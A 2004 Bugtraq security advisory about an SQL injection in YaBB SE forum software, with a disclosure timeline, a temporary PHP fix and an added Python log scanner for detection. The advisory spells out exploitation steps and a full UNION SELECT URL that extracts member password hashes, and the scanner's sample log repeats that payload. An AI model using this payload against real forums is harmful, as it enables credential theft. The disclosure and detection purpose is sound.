The OpenNET Project
Another YabbSE SQL Injection


Date: Mon, 16 Feb 2004 20:34:05 +0100
From: backspace <[email protected]>
To: bugtraq <[email protected]>
Subject: Another YabbSE SQL Injection
Cc: [email protected]

Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board).

An SQL injection vulnerability allows a remote attacker to execute malicious
SQL statements against the database.

Details
Vulnerable Systems:
 * YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
is not validated against malicious input, so it is possible to inject SQL.

How To Exploit the vulnerability:

1- You need to be a registered user to exploit this hole.
2- Click any board you see, e.g. General Discussion.
3- Click any message, e.g. "Welcome to YaBB SE!".
4- Now view the source code of this page and search for the string "sesc"
(without the quotes). This is the session id, a 32-character hex number,
e.g. 13a478d8aa161c2231e6d3b36b6d19f2; you'll need this later.
5- Now your URL is something like this:
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- Change your URL to look like this:

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

The value of sesc is the value you got earlier from the source code.

And voilà, you get the hashed password of the user with id = 1 in the
Subject text box, something like this:
Re:e320774659b1b23333bd033754d21bc4


Vendor Status:
January 23, 2004: I contacted the vendor.
January 23, 2004: Vendor says they are working on it.
January 29, 2004: I sent another email to ask how the work was progressing.
No response.
February 3, 2004: I sent another email to ask about the status of the work.
February 4, 2004: Vendor says they'll figure out how to do it.
February 16, 2004: I didn't want to keep waiting, so I published the
vulnerability.

Temporary Solution:

Open Post.php and go to around line 49.

You'll see something like this:

 $quotemsg = $quote;   // the quote parameter goes straight into the SQL query

Change it to this:

 // Reject anything that is not a number before it reaches the query.
 // Note: is_numeric() also accepts floats, exponents and leading whitespace,
 // so a cast to (int) would be stricter for a message id.
 if ( !is_numeric($quote) )
 {
    die('Go out C==|=======>');
 }

 $quotemsg = $quote;

That's it.
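As an added example (not part of the advisory or of YaBB SE), the following script applies the same idea as the fix above from the detection side: it parses YaBB SE's ';'-separated URLs, accepts only a plain integer for the quote parameter, and flags access-log requests to action=post whose quote value is anything else. The log lines are constructed for illustration; the second one carries the advisory's UNION SELECT payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the advisory); the second line
# carries the advisory's UNION SELECT payload in the quote parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Feb/2004:20:34:05 +0100] "GET /yabbse/index.php?board=1;action=post;threadid=1;title=Post+reply;quote=12 HTTP/1.0" 200 5120
10.0.0.9 - - [16/Feb/2004:20:35:11 +0100] "GET /yabbse/index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* HTTP/1.0" 200 6010
10.0.0.7 - - [16/Feb/2004:20:36:00 +0100] "GET /yabbse/index.php?board=1;action=display;threadid=1 HTTP/1.0" 200 4000
"""

# Client IP, request path and status code from a combined-log-format line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def yabbse_params(request_path):
    """Parse a YaBB SE URL, which joins query parameters with ';' rather than '&'."""
    query = request_path.partition('?')[2]
    params = {}
    for part in query.split(';'):
        key, _, value = part.partition('=')   # split on the first '=' only
        if key:
            params[key] = unquote_plus(value)
    return params


def is_valid_quote(value):
    """Accept only a plain integer message id. This is stricter than PHP's
    is_numeric(), which also accepts floats, exponents and leading whitespace."""
    return re.fullmatch(r'-?\d+', value) is not None


def scan_log(log_text):
    """Return (client_ip, quote_value) for each action=post request whose
    quote parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        params = yabbse_params(path)
        if params.get('action') != 'post' or 'quote' not in params:
            continue
        if not is_valid_quote(params['quote']):
            hits.append((ip, params['quote']))
    return hits


if __name__ == '__main__':
    for ip, payload in scan_log(SAMPLE_LOG):
        print(f'{ip}: suspicious quote parameter: {payload[:60]}')
```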


Credits go to: BackSpace



